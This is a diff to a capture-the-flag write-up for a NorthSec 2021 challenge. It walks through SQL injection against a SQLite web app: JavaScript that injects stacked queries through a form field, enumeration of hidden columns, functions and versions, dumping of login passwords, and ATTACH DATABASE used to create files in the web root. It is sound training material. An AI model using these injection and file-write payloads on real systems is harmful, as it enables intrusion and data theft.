--- a/RingZer0Team/NorthSec-2021/352.md
+++ b/RingZer0Team/NorthSec-2021/352.md
@@ -33,10 +33,10 @@ camera = document.getElementById('camera');
 camera.removeChild(camera.lastElementChild);
 camera.removeChild(camera.lastElementChild);
 camera.lastElementChild.value = "";
-document.getElementById('notes').value = ", notes=(/** INSERT A QUERY TO EXECUTE HERE */) WHERE id=1 --";
+document.getElementById('notes').value = ", notes=(/** INSERT A QUERY TO EXECUTE HERE AND RETRIEVE RESULT */) WHERE id=1 --";
 ```
 
-Which generate the following query:
+Which generate the following queries:
 
 ```sql
 UPDATE 
@@ -44,13 +44,29 @@ UPDATE
 SET 
   first_name = 'WOW'', last_name = '', salary = 50, cameras = '', notes = ', 
   notes =(
-    /** INSERT A QUERY TO EXECUTE HERE */
+    /** INSERT A QUERY TO EXECUTE HERE AND RETRIEVE RESULT */
     ) 
 WHERE 
   id = 1 --' WHERE id=1
 ```
 
 With this method, we can inject any query (without single quote) and prints its result into `notes`.
+
+We can also inject additional queries without retrieving results as follow:
+```js
+document.getElementById('notes').value = "; /** INSERT A QUERY TO EXECUTE HERE */; --";
+```
+
+Which generate the following queries:
+
+```sql
+UPDATE 
+  knight 
+SET 
+  first_name = 'WOW'', last_name = '', salary = 50, cameras = '', notes = '; 
+
+/** INSERT A QUERY TO EXECUTE HERE */; --' WHERE id=1
+```
 
 We start by listing all the columns of the `knight` table, including hidden one:
 - Query: `SELECT group_concat(name) FROM pragma_table_xinfo("knight")`
@@ -75,3 +91,162 @@ We then list all the username of the `login` table:
 We then list all the passwd of the `login` table:
 - Query: `SELECT group_concat(passwd) FROM login`
 - Result: `I'm rich and I know it.`
+
+We find nothing in the SQL database. 
+
+Studying more the website, we observe that http://challenges.ringzer0team.com:10352/flagX is being protected. We therefore try to gain access to the file `flag3` to check if it exists.
+
+- Query: `readfile("test.png")`
+- Result: `Exception: no such function: readfile in /var/www/html/home.php:41`
+
+- Query: `SELECT load_extension("test.so")`
+- Result: `Exception: not authorized in /var/www/html/home.php:41`
+
+- Query: `ATTACH DATABASE "/var/www/html/lol.php" AS lol`
+- Result: `Exception: unable to open database: /var/www/html/lol.php in /var/www/html/home.php:41`
+
+- Query: `ATTACH DATABASE "/var/www/html/flag2" AS lol`
+- Result: `Exception: file is not a database in /var/www/html/home.php:41`
+
+- Query: `ATTACH DATABASE "/var/www/html/flag3" AS lol`
+- Result: `Exception: unable to open database: /var/www/html/flag3 in /var/www/html/home.php:41`
+
+This confirms that `flag3` does not exist...
+
+We list all available functions:
+
+- Query: `SELECT group_concat(name) FROM pragma_list_function()`
+```js
+[
+ "abs",
+ "avg",
+ "bm25",
+ "changes",
+ "char",
+ "coalesce",
+ "count",
+ "count",
+ "cume_dist",
+ "current_date",
+ "current_time",
+ "current_timestamp",
+ "date",
+ "datetime",
+ "dense_rank",
+ "first_value",
+ "fts3_tokenizer",
+ "fts3_tokenizer",
+ "fts5",
+ "fts5_decode",
+ "fts5_decode_none",
+ "fts5_expr",
+ "fts5_expr_tcl",
+ "fts5_fold",
+ "fts5_isalnum",
+ "fts5_rowid",
+ "fts5_source_id",
+ "glob",
+ "group_concat",
+ "group_concat",
+ "hex",
+ "highlight",
+ "ifnull",
+ "instr",
+ "json",
+ "json_array",
+ "json_array_length",
+ "json_array_length",
+ "json_extract",
+ "json_group_array",
+ "json_group_object",
+ "json_insert",
+ "json_object",
+ "json_patch",
+ "json_quote",
+ "json_remove",
+ "json_replace",
+ "json_set",
+ "json_type",
+ "json_type",
+ "json_valid",
+ "julianday",
+ "lag",
+ "lag",
+ "lag",
+ "last_insert_rowid",
+ "last_value",
+ "lead",
+ "lead",
+ "lead",
+ "length",
+ "like",
+ "like",
+ "likelihood",
+ "likely",
+ "load_extension",
+ "load_extension",
+ "lower",
+ "ltrim",
+ "ltrim",
+ "match",
+ "matchinfo",
+ "matchinfo",
+ "max",
+ "max",
+ "min",
+ "min",
+ "nth_value",
+ "ntile",
+ "nullif",
+ "offsets",
+ "optimize",
+ "percent_rank",
+ "printf",
+ "quote",
+ "random",
+ "randomblob",
+ "rank",
+ "replace",
+ "round",
+ "round",
+ "row_number",
+ "rtreecheck",
+ "rtreedepth",
+ "rtreenode",
+ "rtrim",
+ "rtrim",
+ "snippet",
+ "soundex",
+ "sqlite_compileoption_get",
+ "sqlite_compileoption_used",
+ "sqlite_log",
+ "sqlite_source_id",
+ "sqlite_version",
+ "strftime",
+ "substr",
+ "substr",
+ "sum",
+ "time",
+ "total",
+ "total_changes",
+ "trim",
+ "trim",
+ "typeof",
+ "unicode",
+ "unlikely",
+ "upper",
+ "zeroblob"
+]
+```
+
+- Query: `SELECT sqlite_version()`
+- Result: `3.31.1`
+
+- Query: `SELECT * FROM pragma_compile_options()`
+- Result: `COMPILER=gcc-9.3.0`
+
+- Query: `SELECT group_concat(file) FROM pragma_database_list()`
+- Result: `/var/www/html/db/db_b35e5643adc89b38bb82a65596d826ea.sql`
+
+- Query `ATTACH DATABASE \"/var/www/html/db/test.php\" AS test`
+- Result: nothing. However http://challenges.ringzer0team.com:10352//var/www/html/db/test shows a file has been created
